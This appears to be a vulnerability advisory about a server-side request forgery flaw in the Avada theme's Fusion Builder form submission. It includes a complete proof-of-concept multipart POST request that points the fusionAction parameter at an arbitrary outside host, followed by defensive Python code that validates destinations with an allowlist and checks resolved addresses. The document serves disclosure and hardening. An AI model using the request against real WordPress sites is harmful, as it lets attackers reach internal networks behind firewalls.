The plugin, used in the Avada theme, does not validate a parameter in its forms, which allows an attacker to make the server initiate arbitrary HTTP requests (SSRF). The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network, bypassing firewalls and access control measures.
An attacker can control the URL (fusionAction parameter) and method (fusionActionMethod parameter) of the HTTP request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
Content-Length: 1457
Connection: close

-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="formData"

[email protected]&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&privacy_expiration_action=ignore&fusion-form-nonce-10361=e222df00dd&fusion-fields-hold-private-data=
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="action"

fusion_form_submit_form_to_url
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusion_form_nonce"

e222df00dd
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="form_id"

10361
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="post_id"

8988
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="field_labels"

{"email":"Email address"}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="hidden_field_names"

[]
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionAction"

https://arbitrary.com/
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionActionMethod"

post
-----------------------------30259827232283860776499538268—
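The root cause above is that the server forwards the form to whatever fusionAction and fusionActionMethod say, without restricting the destination. The following is an added example of the kind of check a hardened handler would apply before issuing that request; it is not code from the Avada theme or the Fusion Builder plugin. The allowlisted host (forms.example.com), the resolver hook, and the resolved addresses used in the comments are constructed assumptions for this example.

```python
"""SSRF guard for a server-side 'forward this form to a URL' feature.

Added example, not the plugin's own code. Three independent checks:
  1. only the HTTP methods the feature needs (get/post) are accepted;
  2. the destination must be an https URL whose host is on an operator
     allowlist (no credentials, no bare IP literals unless allowlisted);
  3. every address the host resolves to must be globally routable, so an
     allowlisted name cannot be pointed at loopback, RFC 1918 space, or
     link-local ranges such as cloud metadata endpoints.
"""
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

# Assumed operator-configured allowlist (constructed for this example).
ALLOWED_HOSTS = {"forms.example.com"}
ALLOWED_SCHEMES = {"https"}
ALLOWED_METHODS = {"get", "post"}

Resolver = Callable[[str], Iterable[str]]


def dns_resolve(host: str) -> list[str]:
    """Default resolver: every A/AAAA answer for host (live DNS)."""
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def is_public_ip(ip_text: str) -> bool:
    """True only for globally routable addresses; malformed input is rejected."""
    try:
        addr = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    # is_global is False for loopback, private, link-local, multicast,
    # reserved and unspecified ranges (and for IPv4-mapped IPv6 forms).
    return addr.is_global


def check_form_action(url: str, method: str,
                      resolver: Resolver = dns_resolve) -> tuple[bool, str]:
    """Validate the attacker-controllable destination before any request is made.

    Returns (ok, reason). The resolver is injectable so the check can be
    exercised offline with constructed answers.
    """
    if method.lower() not in ALLOWED_METHODS:
        return False, f"method not allowed: {method!r}"

    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme not allowed: {parts.scheme!r}"
    if parts.username or parts.password:
        return False, "credentials embedded in URL"

    host = (parts.hostname or "").lower()
    if not host:
        return False, "missing host"
    if host not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host!r}"

    # Allowlisted names can still be re-pointed at internal space by whoever
    # controls their DNS, so check what the name actually resolves to.
    addrs = list(resolver(host))
    if not addrs:
        return False, "host did not resolve"
    for ip in addrs:
        if not is_public_ip(ip):
            return False, f"host resolves to non-public address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver answers so the demo runs offline.
    public = lambda h: ["93.184.216.34"]
    internal = lambda h: ["10.0.0.5"]
    print(check_form_action("https://forms.example.com/submit", "post", public))
    print(check_form_action("https://arbitrary.com/", "post", public))       # not allowlisted
    print(check_form_action("https://forms.example.com/", "post", internal))  # rebinding to RFC 1918
```

The resolved-address check closes the case where the allowlist alone is not enough, but it is still a time-of-check/time-of-use gap: the HTTP client must connect to the address that was validated (or re-validate the address it actually connects to), otherwise a name that returns a public address on the first lookup and an internal one on the second defeats the check. Also remember that the reflected response body is the second half of this bug; even with a destination allowlist, echoing the upstream response back to an unauthenticated caller should be limited to a status code or a fixed success message.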
Calum Elrick
Yes
2022-04-19 (about 1 year ago)
2022-04-19 (about 1 year ago)
2022-04-20 (about 1 year ago)